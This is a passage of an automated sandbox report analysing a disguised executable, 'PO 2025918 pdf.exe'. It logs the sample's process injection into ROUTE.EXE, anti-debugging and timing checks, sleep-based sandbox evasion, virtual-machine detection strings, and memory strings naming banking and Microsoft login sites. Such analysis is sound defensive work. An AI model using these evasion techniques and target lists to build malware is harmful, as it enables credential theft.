                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02821123 push edx; ret 8_2_02821124
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_028359D1 push eax; retf 8_2_028359D2
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2C311 push ds; ret 8_2_02F2C347
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F2C1D2 push ds; ret 8_2_02F2C347
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_02F261C7 push cs; retf 8_2_02F261C8
                      Source: PO 2025918 pdf.exeStatic PE information: section name: .text entropy: 7.75981250034453

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: PO 2025918 pdf.exe PID: 6468, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FF8C88ED324
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FF8C88ED7E4
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FF8C88ED944
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FF8C88ED504
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FF8C88ED544
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FF8C88ED1E4
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FF8C88F0154
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API/Special instruction interceptor: Address: 7FF8C88EDA44
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory allocated: 1A00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory allocated: 33B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory allocated: 31C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory allocated: 9330000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory allocated: A330000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory allocated: A530000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory allocated: B530000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Code function: 5_2_016D096E rdtsc 5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6039
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 960
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe API coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\ROUTE.EXE API coverage: 2.6 %
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe TID: 4688 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3924 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 2408 Thread sleep count: 40 > 30
                      Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 2408 Thread sleep time: -80000s >= -30000s
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe TID: 412 Thread sleep time: -60000s >= -30000s
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe TID: 412 Thread sleep time: -33000s >= -30000s
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Code function: 8_2_0283C600 FindFirstFileW,FindNextFileW,FindClose, 8_2_0283C600
                      Source: -4108694.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: -4108694.8.dr Binary or memory string: discord.comVMware20,11696428655f
                      Source: -4108694.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: -4108694.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: -4108694.8.dr Binary or memory string: global block list test formVMware20,11696428655
                      Source: -4108694.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2195111905.00000000013C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: -4108694.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: -4108694.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: -4108694.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: -4108694.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: -4108694.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: -4108694.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: -4108694.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: -4108694.8.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: -4108694.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002BAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: -4108694.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: -4108694.8.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                      Source: -4108694.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: -4108694.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: mIrIhAjAJblou.exe, 0000000A.00000002.3896363880.000000000144F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                      Source: -4108694.8.dr Binary or memory string: AMC password management pageVMware20,11696428655
                      Source: -4108694.8.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2195111905.00000000013C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: -4108694.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: -4108694.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: -4108694.8.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: -4108694.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: -4108694.8.dr Binary or memory string: dev.azure.comVMware20,11696428655j
                      Source: -4108694.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: -4108694.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: -4108694.8.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: -4108694.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: firefox.exe, 0000000B.00000002.2750210976.000001C3D5DCC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbb
                      Source: -4108694.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Process queried: DebugPort
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Code function: 5_2_00417A63 LdrLoadDll, 5_2_00417A63
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Code function: 5_2_01728158 mov eax, dword ptr fs:[00000030h] 5_2_01728158
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694260 mov eax, dword ptr fs:[00000030h]5_2_01694260
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694260 mov eax, dword ptr fs:[00000030h]5_2_01694260
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696259 mov eax, dword ptr fs:[00000030h]5_2_01696259
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01718243 mov eax, dword ptr fs:[00000030h]5_2_01718243
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01718243 mov ecx, dword ptr fs:[00000030h]5_2_01718243
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168A250 mov eax, dword ptr fs:[00000030h]5_2_0168A250
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168823B mov eax, dword ptr fs:[00000030h]5_2_0168823B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02E1 mov eax, dword ptr fs:[00000030h]5_2_016A02E1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02E1 mov eax, dword ptr fs:[00000030h]5_2_016A02E1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02E1 mov eax, dword ptr fs:[00000030h]5_2_016A02E1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169A2C3 mov eax, dword ptr fs:[00000030h]5_2_0169A2C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02A0 mov eax, dword ptr fs:[00000030h]5_2_016A02A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A02A0 mov eax, dword ptr fs:[00000030h]5_2_016A02A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov ecx, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017262A0 mov eax, dword ptr fs:[00000030h]5_2_017262A0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE284 mov eax, dword ptr fs:[00000030h]5_2_016CE284
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE284 mov eax, dword ptr fs:[00000030h]5_2_016CE284
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01710283 mov eax, dword ptr fs:[00000030h]5_2_01710283
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01710283 mov eax, dword ptr fs:[00000030h]5_2_01710283
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01710283 mov eax, dword ptr fs:[00000030h]5_2_01710283
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C656A mov eax, dword ptr fs:[00000030h]5_2_016C656A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C656A mov eax, dword ptr fs:[00000030h]5_2_016C656A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C656A mov eax, dword ptr fs:[00000030h]5_2_016C656A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698550 mov eax, dword ptr fs:[00000030h]5_2_01698550
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698550 mov eax, dword ptr fs:[00000030h]5_2_01698550
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE53E mov eax, dword ptr fs:[00000030h]5_2_016BE53E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0535 mov eax, dword ptr fs:[00000030h]5_2_016A0535
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01726500 mov eax, dword ptr fs:[00000030h]5_2_01726500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01764500 mov eax, dword ptr fs:[00000030h]5_2_01764500
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC5ED mov eax, dword ptr fs:[00000030h]5_2_016CC5ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC5ED mov eax, dword ptr fs:[00000030h]5_2_016CC5ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016925E0 mov eax, dword ptr fs:[00000030h]5_2_016925E0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BE5E7 mov eax, dword ptr fs:[00000030h]5_2_016BE5E7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE5CF mov eax, dword ptr fs:[00000030h]5_2_016CE5CF
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE5CF mov eax, dword ptr fs:[00000030h]5_2_016CE5CF
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016965D0 mov eax, dword ptr fs:[00000030h]5_2_016965D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA5D0 mov eax, dword ptr fs:[00000030h]5_2_016CA5D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA5D0 mov eax, dword ptr fs:[00000030h]5_2_016CA5D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017105A7 mov eax, dword ptr fs:[00000030h]5_2_017105A7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017105A7 mov eax, dword ptr fs:[00000030h]5_2_017105A7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017105A7 mov eax, dword ptr fs:[00000030h]5_2_017105A7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B45B1 mov eax, dword ptr fs:[00000030h]5_2_016B45B1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B45B1 mov eax, dword ptr fs:[00000030h]5_2_016B45B1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C4588 mov eax, dword ptr fs:[00000030h]5_2_016C4588
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01692582 mov eax, dword ptr fs:[00000030h]5_2_01692582
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01692582 mov ecx, dword ptr fs:[00000030h]5_2_01692582
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE59C mov eax, dword ptr fs:[00000030h]5_2_016CE59C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171C460 mov ecx, dword ptr fs:[00000030h]5_2_0171C460
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BA470 mov eax, dword ptr fs:[00000030h]5_2_016BA470
